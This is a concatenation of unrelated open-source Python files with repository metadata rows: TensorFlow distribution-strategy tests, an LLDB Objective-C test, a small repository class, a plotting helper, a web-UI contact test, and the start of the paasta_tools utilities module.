      return fn1(mock_model) + 1

    def model_fn(mock_model):
      return fn2(mock_model)

    self._call_and_check(distribution, model_fn, [], 5.5, [fn1, fn2],
                         two_variables=True)

  def testGradientTapeOverNestedDefuns(self, distribution):
    @function.defun
    def fn1(mock_model):
      return mock_model()

    @function.defun
    def fn2(mock_model):
      return fn1(mock_model) + 1

    def model_fn(mock_model):
      with backprop.GradientTape(persistent=True) as gtape:
        result = fn2(mock_model)
      grads = gtape.gradient(result,
                             [v._get() for v in mock_model.variables])
      return grads

    # d(2*v1 + v2 + 1)/dv1 == 2, d/dv2 == 1.
    self._call_and_check(distribution, model_fn, [], [2.0, 1.0], [fn1, fn2],
                         two_variables=True)

  def testPassPerReplica(self, distribution):
    # Per-replica factors produce per-replica outputs.
    @function.defun
    def fn1(mock_model, factor):
      return mock_model(factor)

    factors = values.PerReplica((5.0, 3.0))
    expected_result = values.PerReplica((5.0 * 1.25, 3.0 * 1.25))
    self._call_and_check(distribution, fn1, [factors], expected_result, [fn1])
@combinations.generate(
    combinations.combine(
        distribution=[
            combinations.NamedDistribution(
                "Mirrored",
                # pylint: disable=g-long-lambda
                lambda: mirrored_strategy.MirroredStrategy(
                    devices=mirrored_strategy.all_local_devices(),
                    cross_device_ops=cross_device_ops_lib.ReductionToOneDevice(
                    ),
                ),
                required_gpus=1)
        ],
        mode=["graph"]))
class MultiWorkerMirroredStrategyTest(
    multi_worker_test_base.MultiWorkerTestBase,
    strategy_test_lib.DistributionTestBase):
  """MirroredStrategy configured against a 2-worker cluster (graph mode)."""

  def _configure_distribution_strategy(self, distribution):
    # Point the strategy at a two-worker cluster spec.
    cluster_spec = server_lib.ClusterSpec({
        "worker": ["/job:worker/task:0", "/job:worker/task:1"]
    })
    distribution.configure(cluster_spec=cluster_spec)

  def test_num_replicas_in_sync(self, distribution):
    self._configure_distribution_strategy(distribution)
    # We calculate the total number of gpus across the workers(2) specified in
    # the cluster spec.
    self.assertEqual(context.num_gpus() * 2, distribution.num_replicas_in_sync)

  def testMinimizeLossGraph(self, distribution):
    self._configure_distribution_strategy(distribution)
    self._test_minimize_loss_graph(distribution, learning_rate=0.05)

  def testDeviceScope(self, distribution):
    """Test the device scope of multi-worker MirroredStrategy."""
    self._configure_distribution_strategy(distribution)
    with distribution.scope():
      a = constant_op.constant(1.)
      with ops.device("/cpu:0"):
        b = constant_op.constant(1.)
      # Default placement is the first worker; explicit /cpu:0 is resolved
      # relative to that worker.
      self.assertEqual(a.device, "/job:worker/task:0")
      self.assertEqual(b.device, "/job:worker/task:0/device:CPU:0")

  def testMakeInputFnIteratorWithDataset(self, distribution):
    self._configure_distribution_strategy(distribution)
    dataset_fn = lambda: dataset_ops.Dataset.range(100)
    num_gpus = context.num_gpus()
    num_workers = 2

    # Every worker sees the same shard pattern, so each per-step batch
    # repeats the GPU-local values once per worker.
    expected_values = [[i+j for j in range(num_gpus)] * num_workers
                       for i in range(0, 100, num_gpus)]

    with context.graph_mode(), self.cached_session() as sess:
      # `expected_input_pipeline_id` is None because the input_fn will be called
      # multiple times, each with a different input_pipeline_id.
      input_fn = self._input_fn_to_test_input_context(
          dataset_fn,
          expected_num_replicas_in_sync=num_workers*num_gpus,
          expected_num_input_pipelines=num_workers,
          expected_input_pipeline_id=None)
      iterator = distribution.make_input_fn_iterator(input_fn)
      self._test_input_fn_iterator(
          iterator, distribution.extended.worker_devices, expected_values, sess)

  def testMakeInputFnIteratorWithCallable(self, distribution):
    self._configure_distribution_strategy(distribution)

    def fn():
      # Returns a get-next callable instead of a dataset.
      dataset = dataset_ops.Dataset.range(100)
      it = dataset_ops.make_one_shot_iterator(dataset)
      return it.get_next

    num_gpus = context.num_gpus()
    num_workers = 2

    expected_values = []
    for i in range(0, 100, num_gpus):
      expected_values.append([i+j for j in range(num_gpus)] * num_workers)

    with context.graph_mode(), self.cached_session() as sess:
      # `expected_input_pipeline_id` is None because the input_fn will be called
      # multiple times, each with a different input_pipeline_id.
      input_fn = self._input_fn_to_test_input_context(
          fn,
          expected_num_replicas_in_sync=num_workers*num_gpus,
          expected_num_input_pipelines=num_workers,
          expected_input_pipeline_id=None)
      iterator = distribution.make_input_fn_iterator(input_fn)
      # One-shot iterators cannot be reinitialized; element order is not
      # guaranteed across workers.
      self._test_input_fn_iterator(
          iterator, distribution.extended.worker_devices, expected_values, sess,
          test_reinitialize=False, ignore_order=True)

  def testUpdateConfigProto(self, distribution):
    distribution.configure(cluster_spec={"worker": ["fake1", "fake2"]})

    config_proto = config_pb2.ConfigProto()
    new_config = distribution.update_config_proto(config_proto)

    # Verify isolate_session_state
    self.assertTrue(new_config.isolate_session_state)
@combinations.generate(
    combinations.combine(
        distribution=[
            combinations.NamedDistribution(
                "Mirrored",
                # pylint: disable=g-long-lambda
                lambda: mirrored_strategy.MirroredStrategy(
                    devices=["/job:worker/task:0/gpu:{}".format(
                        i) for i in range(context.num_gpus())]),
                required_gpus=1)
        ],
        mode=["graph"]))
class RemoteSingleWorkerMirroredStrategyGraph(
    multi_worker_test_base.SingleWorkerTestBaseGraph,
    strategy_test_lib.RemoteSingleWorkerMirroredStrategyBase):
  """Graph-mode MirroredStrategy on a single remote worker.

  Each test delegates to the shared implementation in
  RemoteSingleWorkerMirroredStrategyBase.
  """

  def _get_num_gpus(self):
    # Hook used by the base class to size replica expectations.
    return context.num_gpus()

  def testNumReplicasInSync(self, distribution):
    self._testNumReplicasInSync(distribution)

  def testMinimizeLoss(self, distribution):
    self._testMinimizeLoss(distribution)

  def testDeviceScope(self, distribution):
    self._testDeviceScope(distribution)

  def testMakeInputFnIteratorWithDataset(self, distribution):
    self._testMakeInputFnIteratorWithDataset(distribution)

  def testMakeInputFnIteratorWithCallable(self, distribution):
    self._testMakeInputFnIteratorWithCallable(distribution)
class MultiWorkerMirroredStrategyTestWithChief(
    multi_worker_test_base.MultiWorkerTestBase,
    strategy_test_lib.DistributionTestBase):
  """MirroredStrategy against an in-process cluster of 2 workers + 1 chief."""

  @classmethod
  def setUpClass(cls):
    """Create a local cluster with 2 workers and 1 chief."""
    cls._cluster_spec = multi_worker_test_base.create_in_process_cluster(
        num_workers=2, num_ps=0, has_chief=True)
    cls._default_target = "grpc://" + cls._cluster_spec["chief"][0]

  def _make_cross_device_ops(self):
    # Deterministic reduction target keeps these tests device-agnostic.
    return cross_device_ops_lib.ReductionToOneDevice()

  def testMinimizeLossGraph(self):
    with context.graph_mode():
      strategy = mirrored_strategy.MirroredStrategy(
          cross_device_ops=self._make_cross_device_ops())
      strategy.configure(cluster_spec=self._cluster_spec)
      self._test_minimize_loss_graph(strategy, learning_rate=0.05)

  def testMinimizeLossGraphMirroredStrategy(self):
    with context.graph_mode():
      strategy = mirrored_strategy.MirroredStrategy(
          mirrored_strategy.all_local_devices(),
          cross_device_ops=self._make_cross_device_ops())
      strategy.configure(cluster_spec=self._cluster_spec)
      self._test_minimize_loss_graph(strategy, learning_rate=0.05)

  def testMinimizeLossGraphMirroredStrategyWithOneNode(self):
    with context.graph_mode():
      # Build a single-node (chief-only) TF_CONFIG and let the strategy
      # infer its devices/cross-device ops from the environment.
      cluster_spec = {}
      cluster_spec["chief"] = self._cluster_spec["chief"]
      tf_config = {"cluster": cluster_spec}
      with test.mock.patch.dict("os.environ",
                                {"TF_CONFIG": json.dumps(tf_config)}):
        strategy = mirrored_strategy.MirroredStrategy()
        if context.num_gpus() == 0:
          self.assertIsInstance(strategy.extended._inferred_cross_device_ops,
                                cross_device_ops_lib.ReductionToOneDevice)
      self.skipTest("b/130551176, run the following once fixed.")
      self._test_minimize_loss_graph(strategy, learning_rate=0.05)

  def testInitializeFromTFConfig(self):
    with context.graph_mode():
      tf_config = {"cluster": self._cluster_spec}
      with test.mock.patch.dict("os.environ",
                                {"TF_CONFIG": json.dumps(tf_config)}):
        strategy = mirrored_strategy.MirroredStrategy(
            cross_device_ops=self._make_cross_device_ops())
        # 3 cluster nodes, each contributing max(num_gpus, 1) replicas.
        self.assertEqual(
            max(context.num_gpus(), 1) * 3, strategy.num_replicas_in_sync)

  def testSummaryForReplicaZeroOnly(self):
    with context.graph_mode():
      strategy = mirrored_strategy.MirroredStrategy(
          mirrored_strategy.all_local_devices(),
          cross_device_ops=self._make_cross_device_ops())
      strategy.configure(cluster_spec=self._cluster_spec)
      self._test_summary_for_replica_zero_only(strategy)
class MirroredVariableStopGradientTest(test.TestCase, parameterized.TestCase):
  """A mirrored variable passed as a stop_gradient target yields no gradient."""

  @combinations.generate(
      combinations.combine(
          distribution=[
              strategy_combinations.mirrored_strategy_with_one_cpu,
              strategy_combinations.mirrored_strategy_with_one_gpu,
          ],
          mode=["graph"]))
  def testMirroredVariableAsStopGradient(self, distribution):
    with distribution.scope():
      inp = constant_op.constant(1.0)
      x = variables.Variable(1.0)
      y = inp*x
      # With the mirrored variable itself listed in stop_gradients, no
      # gradient flows and the result is None.
      grads = gradients.gradients(x, y, stop_gradients=x)
      self.assertIsNone(grads[0])
@combinations.generate(
    combinations.combine(
        distribution=[
            strategy_combinations.mirrored_strategy_with_gpu_and_cpu,
        ],
        mode=["eager"]))
class FunctionTest(test.TestCase, parameterized.TestCase):
  """tf.function interaction with MirroredStrategy (eager mode)."""

  def testBackwardFunctionDevicePlacement(self, distribution):
    # A concrete function traced once must have its backward pass executed
    # on every replica's device, not just the tracing device.
    with distribution.scope():
      w = variable_scope.variable([1.5], name="w")
      b = variable_scope.variable([0.5], name="b")

    @def_function.function
    def forward(x, w, b):
      return x * w + b

    x = array_ops.identity([1.0], name="x_useless")
    concrete_forward = forward.get_concrete_function(x, w._primary, b._primary)

    with distribution.scope():

      def replica_fn():
        with backprop.GradientTape() as t:
          x = array_ops.identity([1.0], name="x")
          loss = concrete_forward(x, w._get(), b._get()) - [1.0]
          return t.gradient(loss, [w, b])

      def step_fn():
        return distribution.run(replica_fn)

      # Capture run metadata so we can inspect per-device placement below.
      context.enable_run_metadata()
      g1, g2 = step_fn()
      run_metadata = context.export_run_metadata()
      context.disable_run_metadata()
      self.assertEqual(self.evaluate(g1._primary), 1.0)
      self.assertEqual(self.evaluate(g2._primary), 1.0)

      # Verify that this node runs on both devices.
      node_name = "gradients_mul_grad_mul_1_x"
      devices_for_this_node = set()
      for partition_graph in run_metadata.partition_graphs:
        for node in partition_graph.node:
          if node.name == node_name:
            devices_for_this_node.add(node.device)
      devices = [device_util.resolve("/device:GPU:0"),
                 device_util.resolve("/device:CPU:0")]
      self.assertSetEqual(devices_for_this_node, set(devices))

  def testFuctionPreservesAutoGraph(self, distribution):
    # NOTE: "Fuction" typo kept — renaming would change the test's identity.
    # AutoGraph conversion must still apply to code called from a
    # tf.function executed via strategy.run.
    def f():
      self.assertTrue(converter_testing.is_inside_generated_code())
      return 1

    with distribution.scope():

      @def_function.function
      def replica_fn():
        return f()

      distribution.run(replica_fn)
def _replica_id():
  """Return the current replica id wrapped in an identity op (as a Tensor)."""
  rid = ds_context.get_replica_context().replica_id_in_sync_group
  if isinstance(rid, ops.Tensor):
    return array_ops.identity(rid)
  # Plain Python value: lift it to a constant tensor first.
  return array_ops.identity(constant_op.constant(rid))
def _replica_id_as_int():
  """Return the current replica id as a plain Python integer."""
  rid = ds_context.get_replica_context().replica_id_in_sync_group
  # Tensors are folded back to their constant value; ints pass through.
  return tensor_util.constant_value(rid) if isinstance(rid, ops.Tensor) else rid
if __name__ == "__main__":
  # TODO(b/172304955): remove config_logical_devices=False once fixed.
  test_util.main(config_logical_devices=False)
| 39.18873 | 91 | 0.715669 |
d27fc11c83cfd912d163f06289825633042a3cfe | 213 | py | Python | repositories/session.py | jsmsalt/jobs-api | a2c26522bf7f997558f6c6608524187785c830e5 | [
"MIT"
] | null | null | null | repositories/session.py | jsmsalt/jobs-api | a2c26522bf7f997558f6c6608524187785c830e5 | [
"MIT"
] | 5 | 2021-11-29T04:40:14.000Z | 2021-11-29T12:33:44.000Z | repositories/session.py | jsmsalt/jobs-api | a2c26522bf7f997558f6c6608524187785c830e5 | [
"MIT"
] | null | null | null | from repositories.base import BaseRepository
from models.session import Session, SessionCreate, SessionUpdate
class SessionRepository(BaseRepository[Session, SessionCreate, SessionUpdate]):
    """Repository for Session entities.

    Inherits generic CRUD behavior from BaseRepository, parameterized with
    the Session model and its create/update schemas.
    """

    # Model class the inherited BaseRepository operations act on.
    entity = Session
| 30.428571 | 79 | 0.835681 |
7fac08a2a2203bfc19fbd54ef85b6df016377052 | 1,376 | py | Python | machine-learning-ex4/ex4/displayData.py | altermarkive/machine-learning-course | 2f0a2c2269dab2bd61d34d96a75ccdd8b87683c7 | [
"MIT"
] | 1 | 2018-05-11T20:58:03.000Z | 2018-05-11T20:58:03.000Z | machine-learning-ex4/ex4/displayData.py | altermarkive/Machine-Learning-Course | 2f0a2c2269dab2bd61d34d96a75ccdd8b87683c7 | [
"MIT"
] | null | null | null | machine-learning-ex4/ex4/displayData.py | altermarkive/Machine-Learning-Course | 2f0a2c2269dab2bd61d34d96a75ccdd8b87683c7 | [
"MIT"
] | 2 | 2016-11-04T13:40:31.000Z | 2018-05-11T20:58:05.000Z | #!/usr/bin/env python3
import numpy as np
import matplotlib
# Force matplotlib to not use any X Windows backend (must be called befor importing pyplot)
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def displayData(X, example_width=None):
#DISPLAYDATA Display 2D data in a nice grid
# [h, display_array] = DISPLAYDATA(X, example_width) displays 2D data
# stored in X in a nice grid. It returns the figure handle h and the
# displayed array if requested.
figsize = (10, 10)
# Set example_width automatically if not passed in
example_width = example_width or int(np.round(np.sqrt(X.shape[1])))
# Gray Image
cmap='Greys'
# Compute rows, cols
m, n = X.shape
example_height = n / example_width
# Compute number of items to display
display_rows = int(np.floor(np.sqrt(m)))
display_cols = int(np.ceil(m / display_rows))
# Between images padding
pad = 0.025
# Display Image
fig, ax_array = plt.subplots(display_rows, display_cols, figsize=figsize)
fig.subplots_adjust(wspace=pad, hspace=pad)
ax_array = [ax_array] if m == 1 else ax_array.ravel()
for i, ax in enumerate(ax_array):
ax.imshow(X[i].reshape(example_width, example_width, order='F'), cmap=cmap, extent=[0, 1, 0, 1])
# Do not show axis
ax.axis('off')
return fig, ax_array
#end
| 28.666667 | 104 | 0.675872 |
08e9594be69ffb9d1d01e052b2c61482df6161da | 2,198 | py | Python | SymbolExtractorAndRenamer/lldb/packages/Python/lldbsuite/test/lang/objc/objc-optimized/TestObjcOptimized.py | Polidea/SiriusObfuscator | b0e590d8130e97856afe578869b83a209e2b19be | [
"Apache-2.0"
] | 427 | 2018-05-29T14:21:02.000Z | 2022-03-16T03:17:54.000Z | SymbolExtractorAndRenamer/lldb/packages/Python/lldbsuite/test/lang/objc/objc-optimized/TestObjcOptimized.py | PolideaPlayground/SiriusObfuscator | b0e590d8130e97856afe578869b83a209e2b19be | [
"Apache-2.0"
] | 25 | 2018-07-23T08:34:15.000Z | 2021-11-05T07:13:36.000Z | SymbolExtractorAndRenamer/lldb/packages/Python/lldbsuite/test/lang/objc/objc-optimized/TestObjcOptimized.py | PolideaPlayground/SiriusObfuscator | b0e590d8130e97856afe578869b83a209e2b19be | [
"Apache-2.0"
] | 52 | 2018-07-19T19:57:32.000Z | 2022-03-11T16:05:38.000Z | """
Test that objective-c expression parser continues to work for optimized build.
http://llvm.org/viewvc/llvm-project?rev=126973&view=rev
Fixed a bug in the expression parser where the 'this'
or 'self' variable was not properly read if the compiler
optimized it into a register.
"""
from __future__ import print_function
import os
import time
import lldb
import re
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
# rdar://problem/9087739
# test failure: objc_optimized does not work for "-C clang -A i386"
@skipUnlessDarwin
class ObjcOptimizedTestCase(TestBase):
    """Regression test: the ObjC expression parser must still resolve `self`
    (and its members) when the compiler has optimized `self` into a register.
    """

    mydir = TestBase.compute_mydir(__file__)
    # Breakpoint target: -[MyClass description].
    myclass = "MyClass"
    mymethod = "description"
    method_spec = "-[%s %s]" % (myclass, mymethod)

    def test_break(self):
        """Test 'expr member' continues to work for optimized build."""
        self.build()
        exe = os.path.join(os.getcwd(), "a.out")
        self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)

        lldbutil.run_break_set_by_symbol(
            self,
            self.method_spec,
            num_expected_locations=1,
            sym_exact=True)

        self.runCmd("run", RUN_SUCCEEDED)

        # Verify we stopped at the expected breakpoint inside the method.
        self.expect(
            "thread backtrace",
            STOPPED_DUE_TO_BREAKPOINT,
            substrs=["stop reason = breakpoint"],
            patterns=[
                "frame.*0:.*%s %s" %
                (self.myclass,
                 self.mymethod)])

        # Member access through the (possibly register-resident) self.
        self.expect('expression member',
                    startstr="(int) $0 = 5")

        # <rdar://problem/12693963>
        # Pull the actual pointer value of `self` from `frame variable` so
        # the `expression (self)` output can be matched exactly.
        interp = self.dbg.GetCommandInterpreter()
        result = lldb.SBCommandReturnObject()
        interp.HandleCommand('frame variable self', result)
        output = result.GetOutput()

        desired_pointer = "0x0"

        mo = re.search("0x[0-9a-f]+", output)

        if mo:
            desired_pointer = mo.group(0)

        self.expect('expression (self)',
                    substrs=[("(%s *) $1 = " % self.myclass), desired_pointer])

        # Accessing a nonexistent member must produce a clear error.
        self.expect('expression self->non_member', error=True,
                    substrs=["does not have a member named 'non_member'"])
82e3b7df8ee2491938e9799e144029492dbb5685 | 645 | py | Python | test/test_add_contact.py | 12ok/python_train | 436d6a02a83b3bcb6ff248968366dae0a9cafc2e | [
"Apache-2.0"
] | null | null | null | test/test_add_contact.py | 12ok/python_train | 436d6a02a83b3bcb6ff248968366dae0a9cafc2e | [
"Apache-2.0"
] | null | null | null | test/test_add_contact.py | 12ok/python_train | 436d6a02a83b3bcb6ff248968366dae0a9cafc2e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from model.contact import Contact
# test fails if the data contain the characters ' or \
# full output kept in repr so it is easy to see which data were used
def test_add_contact(app, json_contacts, db, check_ui):
    """Create a contact and verify the database (and optionally the UI) shows it."""
    new_contact = json_contacts
    contacts_before = db.get_contact_list()
    app.contact.create(new_contact)
    contacts_after = db.get_contact_list()
    contacts_before.append(new_contact)
    assert contacts_before == contacts_after
    if check_ui:
        expected = sorted(contacts_after, key=Contact.id_or_max)
        displayed = sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
        assert expected == displayed
| 40.3125 | 100 | 0.663566 |
a571c43154a87082374a795232b487c155d84487 | 127,749 | py | Python | paasta_tools/utils.py | cuza/paasta | 15d1b5b09f5d92e4619bf0f3eca70996d1be1639 | [
"Apache-2.0"
] | null | null | null | paasta_tools/utils.py | cuza/paasta | 15d1b5b09f5d92e4619bf0f3eca70996d1be1639 | [
"Apache-2.0"
] | null | null | null | paasta_tools/utils.py | cuza/paasta | 15d1b5b09f5d92e4619bf0f3eca70996d1be1639 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015-2017 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import datetime
import difflib
import errno
import fcntl
import getpass
import glob
import hashlib
import io
import json
import logging
import math
import os
import pwd
import queue
import re
import shlex
import signal
import socket
import ssl
import sys
import tempfile
import threading
import time
import warnings
from collections import OrderedDict
from enum import Enum
from fnmatch import fnmatch
from functools import lru_cache
from functools import wraps
from subprocess import PIPE
from subprocess import Popen
from subprocess import STDOUT
from types import FrameType
from typing import Any
from typing import Callable
from typing import cast
from typing import Collection
from typing import ContextManager
from typing import Dict
from typing import FrozenSet
from typing import IO
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import choice
import dateutil.tz
import ldap3
import requests_cache
import service_configuration_lib
from docker import Client
from docker.utils import kwargs_from_env
from kazoo.client import KazooClient
from mypy_extensions import TypedDict
from service_configuration_lib import read_service_configuration
import paasta_tools.cli.fsm
# DO NOT CHANGE SPACER, UNLESS YOU'RE PREPARED TO CHANGE ALL INSTANCES
# OF IT IN OTHER LIBRARIES (i.e. service_configuration_lib).
# It's used to compose a job's full ID from its name and instance
SPACER = "."
INFRA_ZK_PATH = "/nail/etc/zookeeper_discovery/infrastructure/"
PATH_TO_SYSTEM_PAASTA_CONFIG_DIR = os.environ.get(
"PAASTA_SYSTEM_CONFIG_DIR", "/etc/paasta/"
)
DEFAULT_SOA_DIR = service_configuration_lib.DEFAULT_SOA_DIR
AUTO_SOACONFIG_SUBDIR = "autotuned_defaults"
DEFAULT_DOCKERCFG_LOCATION = "file:///root/.dockercfg"
DEPLOY_PIPELINE_NON_DEPLOY_STEPS = (
"itest",
"itest-and-push-to-registry",
"security-check",
"performance-check",
"push-to-registry",
)
# Default values for _log
ANY_CLUSTER = "N/A"
ANY_INSTANCE = "N/A"
DEFAULT_LOGLEVEL = "event"
no_escape = re.compile(r"\x1B\[[0-9;]*[mK]")
# instead of the convention of using underscores in this scribe channel name,
# the audit log uses dashes to prevent collisions with a service that might be
# named 'audit_log'
AUDIT_LOG_STREAM = "stream_paasta-audit-log"
DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT = (
"http://{host:s}:{port:d}/;csv;norefresh;scope={scope:s}"
)
DEFAULT_CPU_PERIOD = 100000
DEFAULT_CPU_BURST_ADD = 1
DEFAULT_SOA_CONFIGS_GIT_URL = "sysgit.yelpcorp.com"
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
INSTANCE_TYPES = (
"marathon",
"paasta_native",
"adhoc",
"kubernetes",
"tron",
"flink",
"cassandracluster",
"kafkacluster",
"nrtsearchservice",
)
# Linux capabilities dropped from every container by default (see
# InstanceConfig.get_cap_drop), so containers cannot perform privileged
# operations / privilege escalation.
CAPS_DROP = [
    "SETPCAP",
    "MKNOD",
    "AUDIT_WRITE",
    "CHOWN",
    "NET_RAW",
    "DAC_OVERRIDE",
    "FOWNER",
    "FSETID",
    "KILL",
    "SETGID",
    "SETUID",
    "NET_BIND_SERVICE",
    "SYS_CHROOT",
    "SETFCAP",
]
class RollbackTypes(Enum):
    # How a rollback was triggered: automatically (SLO violation) or by a
    # person. NOTE(review): presumably recorded in deploy/audit metadata --
    # confirm at call sites, none are visible in this file chunk.
    AUTOMATIC_SLO_ROLLBACK = "automatic_slo_rollback"
    USER_INITIATED_ROLLBACK = "user_initiated_rollback"
class TimeCacheEntry(TypedDict):
    # Cached return value and the wall-clock time (time.time()) it was stored.
    data: Any
    fetch_time: float


_CacheRetT = TypeVar("_CacheRetT")


class time_cache:
    """Decorator that memoizes a function's results for ``ttl`` seconds.

    A ``ttl`` of 0 (the default) disables caching.  Callers may override
    the TTL per call by passing a ``ttl=`` keyword argument, which is
    consumed by the wrapper and NOT forwarded to the wrapped function.
    """

    def __init__(self, ttl: float = 0) -> None:
        self.configs: Dict[Tuple, TimeCacheEntry] = {}
        self.ttl = ttl

    def __call__(self, f: Callable[..., _CacheRetT]) -> Callable[..., _CacheRetT]:
        @wraps(f)  # preserve the wrapped function's name/docstring
        def cache(*args: Any, **kwargs: Any) -> _CacheRetT:
            # Per-call TTL override; pop so it isn't passed to f.
            ttl = kwargs.pop("ttl", self.ttl)
            # Sort kwargs so calls differing only in keyword order hit the
            # same entry (the previous implementation concatenated items in
            # dict order, so f(a=1, b=2) and f(b=2, a=1) could miss).
            key = args + tuple(sorted(kwargs.items()))
            entry = self.configs.get(key)
            if not ttl or entry is None or time.time() - entry["fetch_time"] > ttl:
                entry = self.configs[key] = {
                    "data": f(*args, **kwargs),
                    "fetch_time": time.time(),
                }
            return entry["data"]

        return cache
_SortDictsT = TypeVar("_SortDictsT", bound=Mapping)


def sort_dicts(dcts: Iterable[_SortDictsT]) -> List[_SortDictsT]:
    """Sort mappings deterministically by their sorted (key, value) pairs."""
    return sorted(dcts, key=lambda dct: tuple(sorted(dct.items())))
class InvalidInstanceConfig(Exception):
    """Raised when an instance's soa-configs values are mutually inconsistent
    (e.g. both ``cmd`` and ``args`` are specified; see InstanceConfig.get_args)."""
    pass
DeployBlacklist = List[Tuple[str, str]]
DeployWhitelist = Optional[Tuple[str, List[str]]]
# The actual config files will have lists, since tuples are not expressible in base YAML, so we define different types
# here to represent that. The getter functions will convert to the safe versions above.
UnsafeDeployBlacklist = Optional[Sequence[Sequence[str]]]
UnsafeDeployWhitelist = Optional[Sequence[Union[str, Sequence[str]]]]
Constraint = Sequence[str]
# e.g. ['GROUP_BY', 'habitat', 2]. Marathon doesn't like that so we'll convert to Constraint later.
UnstringifiedConstraint = Sequence[Union[str, int, float]]
SecurityConfigDict = Dict # Todo: define me.
class VolumeWithMode(TypedDict):
    # Access mode for the mount (presumably "RO"/"RW" -- confirm at callers).
    mode: str


class DockerVolume(VolumeWithMode):
    # Host bind-mount; camelCase keys match the Mesos/Marathon volume spec
    # referenced in InstanceConfig.get_extra_volumes.
    hostPath: str
    containerPath: str


class AwsEbsVolume(VolumeWithMode):
    # AWS EBS volume to attach and mount at container_path.
    volume_id: str
    fs_type: str
    partition: int
    container_path: str


class PersistentVolume(VolumeWithMode):
    # Persistent volume claim; `size` units are not stated here --
    # presumably MB, confirm against the scheduler code that consumes it.
    size: int
    container_path: str
    storage_class_name: str


class SecretVolumeItem(TypedDict, total=False):
    # One key of a secret, projected to `path` with optional file `mode`.
    key: str
    path: str
    mode: Union[str, int]


class SecretVolume(TypedDict, total=False):
    # A secret mounted as files under container_path.
    secret_name: str
    container_path: str
    default_mode: Union[str, int]
    items: List[SecretVolumeItem]
class MonitoringDict(TypedDict, total=False):
    """Monitoring/alerting overrides for an instance (see
    InstanceConfig.get_monitoring).  All keys optional (total=False)."""

    alert_after: Union[str, float]
    check_every: str
    check_oom_events: bool
    component: str
    description: str
    notification_email: Union[str, bool]
    page: bool
    priority: str
    project: str
    realert_every: float
    runbook: str
    slack_channels: Union[str, List[str]]
    tags: List[str]
    team: str
    ticket: bool
    tip: str
class InstanceConfigDict(TypedDict, total=False):
    """Raw per-instance soa-configs dictionary backing InstanceConfig.

    All keys are optional (total=False); the InstanceConfig accessors
    supply defaults (e.g. mem=4096, cpus=1, disk=1024, pool="default").
    """

    deploy_group: str
    mem: float
    cpus: float
    disk: float
    cmd: str
    args: List[str]
    cfs_period_us: float
    cpu_burst_add: float
    cap_add: List
    env: Dict[str, str]
    monitoring: MonitoringDict
    deploy_blacklist: UnsafeDeployBlacklist
    deploy_whitelist: UnsafeDeployWhitelist
    pool: str
    persistent_volumes: List[PersistentVolume]
    role: str
    extra_volumes: List[DockerVolume]
    aws_ebs_volumes: List[AwsEbsVolume]
    secret_volumes: List[SecretVolume]
    security: SecurityConfigDict
    dependencies_reference: str
    dependencies: Dict[str, Dict]
    constraints: List[UnstringifiedConstraint]
    extra_constraints: List[UnstringifiedConstraint]
    net: str
    extra_docker_args: Dict[str, str]
    gpus: int
    branch: str
class BranchDictV1(TypedDict, total=False):
    """Legacy (v1) per-branch deployment data from deployments.json."""

    docker_image: str
    desired_state: str
    force_bounce: Optional[str]


class BranchDictV2(TypedDict):
    """Per-deploy-group deployment data from deployments.json (v2); all
    keys required, including the git sha the docker image was built from."""

    git_sha: str
    docker_image: str
    desired_state: str
    force_bounce: Optional[str]


class DockerParameter(TypedDict):
    """One --<key>=<value> flag for `docker run` (see
    InstanceConfig.format_docker_parameters)."""

    key: str
    value: str
def safe_deploy_blacklist(input: UnsafeDeployBlacklist) -> DeployBlacklist:
    """Convert the raw YAML blacklist (list of 2-element lists) into a
    list of (location_type, location) tuples."""
    return [(location_type, location) for location_type, location in input]
def safe_deploy_whitelist(input: UnsafeDeployWhitelist) -> DeployWhitelist:
    """Convert the raw YAML whitelist into a (location_type, values) tuple.

    Returns None when the input cannot be unpacked into two elements due
    to a TypeError (e.g. it is None/absent).
    """
    try:
        location_type, allowed_values = input
    except TypeError:
        return None
    return cast(str, location_type), cast(List[str], allowed_values)
# For mypy typing
InstanceConfig_T = TypeVar("InstanceConfig_T", bound="InstanceConfig")
class InstanceConfig:
config_filename_prefix: str
    def __init__(
        self,
        cluster: str,
        instance: str,
        service: str,
        config_dict: InstanceConfigDict,
        branch_dict: Optional[BranchDictV2],
        soa_dir: str = DEFAULT_SOA_DIR,
    ) -> None:
        """Hold one service instance's soa-configs plus deployment data.

        :param config_dict: raw instance configuration from soa-configs
        :param branch_dict: per-deploy-group data from deployments.json,
            or None when deployments.json data is unavailable
        :param soa_dir: root of the soa-configs checkout
        """
        self.config_dict = config_dict
        self.branch_dict = branch_dict
        self.cluster = cluster
        self.instance = instance
        self.service = service
        self.soa_dir = soa_dir
        self._job_id = compose_job_id(service, instance)
        # Allow {cluster}/{instance}/{service} placeholders in selected
        # config values; currently only deploy_group is interpolated.
        config_interpolation_keys = ("deploy_group",)
        interpolation_facts = self.__get_interpolation_facts()
        for key in config_interpolation_keys:
            if (
                key in self.config_dict
                and self.config_dict[key] is not None  # type: ignore
            ):
                self.config_dict[key] = self.config_dict[key].format(  # type: ignore
                    **interpolation_facts
                )
def __repr__(self) -> str:
return "{!s}({!r}, {!r}, {!r}, {!r}, {!r}, {!r})".format(
self.__class__.__name__,
self.service,
self.instance,
self.cluster,
self.config_dict,
self.branch_dict,
self.soa_dir,
)
def __get_interpolation_facts(self) -> Dict[str, str]:
return {
"cluster": self.cluster,
"instance": self.instance,
"service": self.service,
}
def get_cluster(self) -> str:
return self.cluster
def get_instance(self) -> str:
return self.instance
def get_service(self) -> str:
